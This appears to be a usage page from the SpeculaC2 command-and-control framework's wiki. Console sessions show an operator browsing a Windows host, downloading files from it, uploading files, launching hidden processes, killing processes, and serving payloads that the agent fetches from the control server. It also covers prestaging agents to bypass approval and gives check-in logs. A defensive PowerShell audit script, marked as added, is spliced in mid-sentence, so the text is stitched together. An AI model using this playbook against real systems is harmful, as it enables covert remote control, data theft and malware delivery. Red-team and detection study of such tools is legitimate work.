Example Scenarios and usage
A tutorial video on using modules can be found on YouTube: https://www.youtube.com/watch?v=edJ_cRW5aQM&list=PLk-dPXV5k8SE_g2507i2Qsu-dj3nRnTgA&index=5
SpeculaC2:hostname>usemodule operation/file/list_dir
SpeculaC2:hostname:operation/file/list_dir>set directory c:\
SpeculaC2:hostname:operation/file/list_dir>run
Module operation/file/list_dir added to execution queue
SpeculaC2:hostname>data
07/24/2024-07:58:19 -- operation/file/list_dir
Parent Folder: c:\
F: C:\DumpStack.log.tmp - Size: 0mb - LastModified: 7/23/2024 1:20:25 AM
F: C:\pagefile.sys - Size: 3200mb - LastModified: 7/23/2024 1:20:25 AM
F: C:\swapfile.sys - Size: 256mb - LastModified: 7/23/2024 1:20:25 AM
D: C:\$Recycle.Bin - LastModified: 7/22/2024 11:45:41 AM
D: C:\$WinREAgent - LastModified: 7/23/2024 12:35:52 AM
D: C:\Documents and Settings - LastModified: 8/29/2022 11:49:04 PM
D: C:\MSOCache - LastModified: 9/22/2022 9:03:49 PM
D: C:\PerfLogs - LastModified: 12/7/2019 11:14:52 AM
D: C:\Program Files - LastModified: 6/24/2024 5:40:27 PM
D: C:\Program Files (x86) - LastModified: 4/17/2024 12:16:10 AM
D: C:\ProgramData - LastModified: 5/2/2024 10:54:50 PM
D: C:\Recovery - LastModified: 4/12/2024 1:52:38 PM
D: C:\SQL2022 - LastModified: 5/1/2024 1:58:39 AM
D: C:\System Volume Information - LastModified: 8/29/2022 2:49:13 PM
D: C:\temp - LastModified: 7/24/2024 1:58:08 PM
D: C:\Users - LastModified: 7/22/2024 11:44:32 AM
D: C:\Windows - LastModified: 7/23/2024 1:19:44 AM
We want to look inside c:\temp.
SpeculaC2:hostname>usemodule operation/file/list_dir
SpeculaC2:hostname:operation/file/list_dir>set directory c:\temp
SpeculaC2:hostname:operation/file/list_dir>run
Module operation/file/list_dir added to execution queue
SpeculaC2:hostname>data
07/24/2024-07:59:29 -- operation/file/list_dir
Parent Folder: c:\temp
F: C:\temp\importantfile.txt - Size: 0mb - LastModified: 7/22/2024 1:19:18 PM
We now want to download that file.
SpeculaC2:hostname>usemodule operation/file/get_file
SpeculaC2:hostname:operation/file/get_file>set file c:\temp\importantfile.txt
SpeculaC2:hostname:operation/file/get_file>set destination /tmp/importantfile.txt
SpeculaC2:hostname:operation/file/get_file>run
Module operation/file/get_file added to execution queue
SpeculaC2:hostname>07/24/2024-08:01:00 - hostname: Finished downloading file "c:\temp\importantfile.txt" it was written to /tmp/importantfile.txt
SpeculaC2:hostname>usemodule operation/file/put_file
SpeculaC2:hostname:operation/file/put_file>set file /tmp/file2upload.txt
SpeculaC2:hostname:operation/file/put_file>set destination c:\temp\file2upload.txt
SpeculaC2:hostname:operation/file/put_file>run
Module operation/file/put_file added to execution queue
SpeculaC2:hostname>07/24/2024-08:02:30 - Finished uploading file to hostname at c:\temp\file2upload.txt - Sizes match: server:7 - agent:7
SpeculaC2:hostname>usemodule operation/registry/getallvaluesregistry
SpeculaC2:hostname:operation/registry/getallvaluesregistry>set Root HKCU
SpeculaC2:hostname:operation/registry/getallvaluesregistry>set PathToKey SOFTWARE\Microsoft\Office\16.0\Outlook\webview\Inbox
SpeculaC2:hostname:operation/registry/getallvaluesregistry>run
Module operation/registry/getallvaluesregistry added to execution queue
SpeculaC2:hostname>data
07/24/2024-08:04:20 -- operation/registry/getallvaluesregistry
Path: HKCU\SOFTWARE\Microsoft\Office\16.0\Outlook\webview\Inbox
ValueName: url
RegType: REG_SZ
Value: http://192.168.86.245/css/Yc5JkyYCXeJ3qA
Path: HKCU\SOFTWARE\Microsoft\Office\16.0\Outlook\webview\Inbox
ValueName: security
RegType: REG_SZ
Value: yes
The module demonstrated here starts the process hidden from the user.
Let's start notepad.exe as an example.
SpeculaC2:hostname>usemodule execute/host/spawnproc_explorer
SpeculaC2:hostname:execute/host/spawnproc_explorer>set command c:\windows\notepad.exe
SpeculaC2:hostname:execute/host/spawnproc_explorer>run
Let's start msiexec.exe /? as an example.
SpeculaC2:hostname>usemodule execute/host/spawnproc_explorer
SpeculaC2:hostname:execute/host/spawnproc_explorer>set command c:\windows\system32\msiexec.exe
SpeculaC2:hostname:execute/host/spawnproc_explorer>set arguments /?
SpeculaC2:hostname:execute/host/spawnproc_explorer>run
Get the PID of the process first. Let's target the msiexec process we started.
SpeculaC2:hostname>usemodule enumerate/host/list_processes
SpeculaC2:hostname:enumerate/host/list_processes>run
SpeculaC2:hostname>data
<SNIP>
PID PPID Arch ProcessName Executable Path
8500 2848 x64 Taskmgr.exe
7096 696 x64 svchost.exe
9956 2848 x64 msiexec.exe C:\windows\system32\msiexec.exe
</SNIP>
SpeculaC2:hostname>usemodule execute/host/wmi_killprocpid
SpeculaC2:hostname:execute/host/wmi_killprocpid>set pid 9956
SpeculaC2:hostname:execute/host/wmi_killprocpid>run
We prepared a file under /tmp/filetohost.txt that the agent will download.
SpeculaC2>payload
SpeculaC2:payload>add /tmp/filetohost.txt
SpeculaC2:payload>list
id url sourcepath
fLSbQ4Z1 http://192.168.86.245/GvTEg7Eu7m/fLSbQ4Z1 /tmp/filetohost.txt
Go into the interact menu of the agent.
SpeculaC2:hostname>usemodule operation/file/download_filehttp
SpeculaC2:hostname:operation/file/download_filehttp>set url http://192.168.86.245/GvTEg7Eu7m/fLSbQ4Z1
SpeculaC2:hostname:operation/file/download_filehttp>run
Go back to the main Specula menu (use back).
SpeculaC2>payload
SpeculaC2:payload>list
id url sourcepath
fLSbQ4Z1 http://192.168.86.245/GvTEg7Eu7m/fLSbQ4Z1 /tmp/filetohost.txt
SpeculaC2:payload>remove fLSbQ4Z1
Removed imported payload from DB and filesystem
Sometimes when testing we want to start over, so here are the steps needed to reset Specula. First, remove the URL value from the registry of all your agents. Next, on the server, run:
SpeculaC2>resetdb
Are you sure you want to delete all agents from database?
A PREFERRED WAY WOULD BE TO RUN THE TASK: Exe - Remove Homepage on each agent.
You will not be able to recover this after you answer yes.
You have been WARNED!
Type YES to confirm (needs to be uppercase) - Anything else will exit without deleting
YES
Removed all data from agents.db
You have now deleted all the data from the database. To delete all collected agent data as well, exit Specula, go into the agent_data folder on the filesystem and remove *.txt.
To delete all logs as well, delete the following files:
- weblog.log
- specula_log.txt
- operator_log.txt
If you also want to start over with the config, delete the specConfig.ini file as well.
You should now have a fresh Specula running again.
The purpose of prestaging is to skip the entire approval process and go straight to a fully working agent after a few check-ins. Creating a prestage generates a unique URL and decryption key that can be set on an agent directly.
SpeculaC2>prestage
SpeculaC2:prestage>new
Encryptionkey: kP1knw8iHNtcUA0MtusdcA Url:http://192.168.86.245/css/Qlwg0DWsXMUXCQ
The encryption key is then set on the agent under the location you specified during the setup of Specula (Encryptionkey Registry Location). The URL goes in the standard location HKCU\SOFTWARE\Microsoft\Office\16.0\Outlook\Webview\Inbox, in the url value.
Once you have started the agent using the prestaged URL and encryption key, you should see the following in the log:
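The Outlook WebView Inbox url value is the one registry location this page names twice: in the getallvaluesregistry output above and in the prestage step just described, and the reset instructions tell you to remove it from every agent. An administrator auditing a Windows host for it, or cleaning it up afterwards, would check every loaded user profile rather than only the current HKCU. The following PowerShell is an added example written for this page; it is not part of the SpeculaC2 wiki or project. It assumes the Office version key 16.0 (the only one shown on this page; the $officeVersions list is yours to extend), and the -Remediate switch is a hypothetical option of this script, not a Specula feature. The encryption key value is not checked because the page says its location is chosen at setup time.

```powershell
# Added example, not part of the SpeculaC2 wiki: audit every loaded user hive for an
# Outlook WebView Inbox home-page URL (the registry value shown on this page).
# Assumptions: Office version key 16.0 (the only one on the page); -Remediate is a
# hypothetical switch of this script, not a Specula feature.
param(
    [switch]$Remediate   # remove the url value instead of only reporting it
)

$officeVersions = @('16.0')

# HKEY_USERS lists every profile whose hive is currently loaded, so this covers
# more than the interactive user's HKCU. Class-hive subkeys (*_Classes) are skipped.
$hives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -notlike '*_Classes' }

$findings = foreach ($hive in $hives) {
    foreach ($ver in $officeVersions) {
        $keyPath = "Registry::$($hive.Name)\SOFTWARE\Microsoft\Office\$ver\Outlook\WebView\Inbox"
        if (-not (Test-Path -Path $keyPath)) { continue }

        $props = Get-ItemProperty -Path $keyPath -ErrorAction SilentlyContinue
        if ([string]::IsNullOrEmpty($props.url)) { continue }

        # Report the same two values the page's getallvaluesregistry output shows.
        [pscustomobject]@{
            UserSid  = $hive.PSChildName
            Office   = $ver
            Url      = $props.url
            Security = $props.security
            KeyPath  = $keyPath
        }
    }
}

if (-not $findings) {
    Write-Output 'No Outlook WebView Inbox URL set in any loaded user hive.'
    return
}

$findings | Format-Table -Property UserSid, Office, Url, Security -AutoSize

if ($Remediate) {
    foreach ($f in $findings) {
        # Clearing the url value is what the page's reset instructions call for on each agent.
        Remove-ItemProperty -Path $f.KeyPath -Name 'url'
        Write-Output "Removed url value from $($f.KeyPath)"
    }
}
```

Run it from an elevated prompt so the other users' hives under HKEY_USERS are readable; profiles that are not currently loaded do not appear there, so a full sweep of a shared machine also needs their NTUSER.DAT hives loaded first. Any url value found is worth recording (the page's examples point at a URL under /css/ on the Specula server) before you remove it with -Remediate.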
SpeculaC2>log
07/24/2024-09:04:38 - *** [INBOUND GET] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240): Valid Useragent
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Unique Agent URL triggered
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Updating Lastseen, Useragent and callback count
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Prestaged agents first checkin, executing special task to update database
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Agent Connected
07/24/2024-09:04:43 - *** [INBOUND GET] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ/np4VYEI
07/24/2024-09:04:43 - *** [AGENTCOM] (192.168.86.240): Valid Useragent
07/24/2024-09:05:13 - *** [INBOUND GET] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ/OdgXDRqb
07/24/2024-09:05:13 - *** [AGENTCOM] (192.168.86.240): Valid Useragent
07/24/2024-09:05:13 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Requesting Encrypted Code
07/24/2024-09:05:13 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Found queued task to execute - enumerate/host/list_basic
07/24/2024-09:05:14 - *** [INBOUND POST] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Data returned from agent
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240): RETURN DATA - 3E2354192016550C726E071330224521155817010E2E665A720403074D1D2D3C3A0238240A6D3030202F370E3B7D00232D330F241B437E36262442091B18120D0D7B4B14743825237739657F3C2011767D1E797F261706332F1E622F011A5900267454341A137B0A263A26346E4B273F560400574B0C3A3811116F616C113030202F370E3B7D00232D330F241B437E2B3A2C553D15011B5E431D3E2354191D2B4B192D2D010F346C5428191A7E6E36320E226119011151052D7454206F1D653E1107003810310E3344070F5A5C0C25217969584B
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Data written to agent_data/csmrnyxsc8.txt
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240) (DESKTOP-1HCD7MS): Removed executed task from queue
This special task updates the database with the agent's actual computer name and basic host information.